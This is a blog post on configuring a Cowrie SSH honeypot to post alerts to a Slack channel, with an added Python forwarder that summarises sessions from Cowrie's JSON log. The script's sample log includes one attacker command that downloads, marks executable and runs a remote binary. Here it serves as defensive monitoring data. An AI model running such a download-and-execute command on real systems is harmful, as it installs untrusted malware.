I found myself with a rare 30 minutes this evening to twiddle my thumbs (between making pasta bake for the family and time to be reading bedtime stories), and attempted to tick a random task off my to-do list. As you may have guessed from the title, that task was feeding activity from a Cowrie SSH honeypot into Slack.
Warnings first; whilst you can achieve the same end-goal, my experience suggests you may also come to regret it – consider yourselves warned….
Still here? Don’t say I didn’t warn you…
Components
As you might have guessed, we need:
* Cowrie Honeypot
* Slack Channel
* Slack Bot
* Not enough sense to heed my warning above…
Slack Channel
I’ll assume you already have a Slack Workspace in mind for the integration; setting this up is outside the scope of this write-up, so I’ll leave that as an exercise for the reader. Once you’re ready, choose an existing channel or (preferably) create a dedicated one, since the honeypot will be posting often.
With that selected, make a note of the Channel ID from the About tab in the channel’s settings. You want the ID itself (something like C0123456789), not the channel name. If you pick a private channel, the bot also has to be invited into it; the chat:write.public permission used below only lets a bot post to public channels it isn’t a member of.
Slack Bot
Next up, we need a Bot for the integration. I’m far from a Slack specialist, so I’ll admit that to get started I simply typed bot into the menu bar and chose the helpful-looking “Create a bot for your workspace” feature shown below.
From here I needed to set two components:
Slack Bot – OAuth Permissions
Admittedly this took me some trial and error; the Cowrie documentation for this feature isn’t the most verbose (or I failed to locate it between oven alarms to deal with the next step for pasta bake), but eventually providing the permission of chat:write.public got the integration working.
Slack Bot – OAuth Token
Once permissions are set, and from the same page, install the app to your workspace and accept the requested permissions when prompted. Slack then issues a Bot User OAuth Token (it starts with xoxb-); copy it for the final step. Treat it as a credential: anyone holding it can post to your workspace as the bot.
Cowrie Honeypot
If you’re this far, I’m going to assume you already have a functional Cowrie installation. If not, I can help with either a quick and dirty build script or a more mature (but still WIP) Terraform IaC deployment. Once it is running, the settings go in {cowrie-install-path}/etc/cowrie.cfg, the local overrides file that Cowrie reads after its cowrie.cfg.dist defaults (leave the .dist file alone so an upgrade doesn’t wipe your changes). Add a section like the below; because the token is a secret, keep the file readable only by the user Cowrie runs as and out of version control.
[output_slack]
enabled = true
channel = <CHANNEL_ID>
token = <BOT_TOKEN>
debug = false
And with that, a quick bin/cowrie stop & bin/cowrie start to reload, and you should be good. If nothing shows up, var/log/cowrie/cowrie.log is the place to look: the Slack output depends on the Slack Python client, which is listed in Cowrie’s requirements-output.txt rather than the base requirements, so an import error there means installing it into Cowrie’s virtualenv; an error returned by Slack itself usually means the channel ID or token is wrong, or the bot isn’t allowed into the channel.
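If the firehose turns out to be too much, the alternative is to do the filtering yourself: read Cowrie’s JSON log, collapse each session into a single message, and post that with the same bot token and channel ID. The following Python script is an added example written for this page; it is not Cowrie’s Slack output plugin and not the author’s code. The log lines in it are constructed (the field names follow Cowrie’s event schema, the IPs, session IDs and hash are made up), SLACK_BOT_TOKEN and SLACK_CHANNEL_ID are assumed environment-variable names, and nothing is sent unless you run it as a script with those set.

```python
"""Per-session Cowrie -> Slack forwarder (added example, not Cowrie's own plugin)."""
import json
import os
import urllib.request

SLACK_POST_URL = "https://slack.com/api/chat.postMessage"

# Constructed sample of Cowrie's JSON log (var/log/cowrie/cowrie.json): eventid and
# field names follow Cowrie's schema; IPs, session ids and the hash are made up.
# The blank line and cut-off last line mimic partial writes seen when tailing a live log.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "src_port": 51234, "protocol": "ssh", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:11.123456Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:12.000000Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:13.000000Z"}
{"eventid": "cowrie.command.input", "input": "uname -a", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:14.000000Z"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://203.0.113.9/x86 -O x86 && chmod +x x86 && ./x86 <secret>", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:15.000000Z"}
{"eventid": "cowrie.session.file_download", "url": "http://203.0.113.9/x86", "outfile": "var/lib/cowrie/downloads/0123abcd", "shasum": "0123abcd", "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:16.000000Z"}
{"eventid": "cowrie.session.closed", "duration": 5.1, "session": "a1b2c3d4e5f6", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:02:16.500000Z"}

{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.77", "src_port": 40001, "protocol": "ssh", "session": "f6e5d4c3b2a1", "sensor": "honeypot-01", "timestamp": "2024-05-01T19:03:00.000000Z"}
{"eventid": "cowrie.login.failed", "username": "admin", "pass
"""


def parse_cowrie_log(text):
    """Return one dict per JSON line; blank or half-written lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:  # partial record at the tail of a live log
            continue
    return events


def summarise_sessions(events):
    """Fold events into one summary per closed session that got past the login prompt.

    Connects, failed logins and sessions that never logged in produce no message at
    all, which is where most of the noise comes from; a password-guessing run costs
    you nothing in Slack.  Returns {session_id: summary} in the order sessions closed.
    """
    live, done = {}, {}
    for ev in events:
        sid, kind = ev.get("session"), ev.get("eventid")
        if sid is None:
            continue
        s = live.setdefault(sid, {"session": sid, "sensor": ev.get("sensor"), "src_ip": None,
                                  "login": None, "commands": [], "downloads": [], "duration": None})
        if kind == "cowrie.session.connect":
            s["src_ip"] = ev.get("src_ip")
        elif kind == "cowrie.login.success":
            s["login"] = (ev.get("username", ""), ev.get("password", ""))
        elif kind == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif kind == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url", ""), ev.get("shasum", "")))
        elif kind == "cowrie.session.closed":
            s["duration"] = ev.get("duration")
            live.pop(sid)
            if s["login"] or s["commands"] or s["downloads"]:
                done[sid] = s
    return done


def slack_escape(text):
    """Neutralise attacker-controlled text before it goes into a Slack message.

    Slack's markup treats &, < and > specially ('<http://evil|click me>' renders as a
    link with attacker-chosen text), and its documented escaping is exactly these
    three replacements in this order.  Backticks have no escape, so they are swapped
    out to keep the code span around a command from being broken out of.
    """
    text = text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    return text.replace("`", "'")


def format_summary(s):
    """Render one session summary as Slack mrkdwn text."""
    user, pw = s["login"] or ("-", "-")
    lines = [f"*Cowrie session {s['session']} on {s['sensor']}* from `{s['src_ip']}` ({s['duration']}s)",
             f"login: `{slack_escape(user)}` / `{slack_escape(pw)}`"]
    lines += [f"> `{slack_escape(cmd)}`" for cmd in s["commands"]]
    lines += [f"download: `{slack_escape(url)}` sha256 `{sha}`" for url, sha in s["downloads"]]
    return "\n".join(lines)


def build_request(token, channel, text):
    """Build the chat.postMessage call; the bot token travels only in the Authorization header."""
    body = json.dumps({"channel": channel, "text": text}).encode("utf-8")
    return urllib.request.Request(SLACK_POST_URL, data=body, method="POST",
                                  headers={"Authorization": f"Bearer {token}",
                                           "Content-Type": "application/json; charset=utf-8"})


def main():
    """Post one summary per finished session in SAMPLE_LOG (env var names are assumed)."""
    token, channel = os.environ["SLACK_BOT_TOKEN"], os.environ["SLACK_CHANNEL_ID"]
    for s in summarise_sessions(parse_cowrie_log(SAMPLE_LOG)).values():
        with urllib.request.urlopen(build_request(token, channel, format_summary(s)), timeout=10) as r:
            reply = json.load(r)
        if not reply.get("ok"):  # Slack answers HTTP 200 with ok=false on API errors
            raise RuntimeError(f"Slack rejected message: {reply.get('error')}")


if __name__ == "__main__":
    main()
```

To run it against a real honeypot, swap SAMPLE_LOG for the contents of var/log/cowrie/cowrie.json (or feed it the output of tail -F in a loop) and keep the same bot, scope and channel ID you set up above; the escaping step matters because everything in the summary except the session ID and timestamp was typed by the attacker.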
But remember, just because you can do something doesn’t mean it’s necessarily a good idea. A honeypot on the public internet sees a constant stream of connections and password guesses, and with this integration every one of them lands in the channel, so even Slack itself gets sick of the notifications in short order. I take no responsibility for wearing out either your speakers or your sanity, ‘ere be digital dragons…..
—
Andrew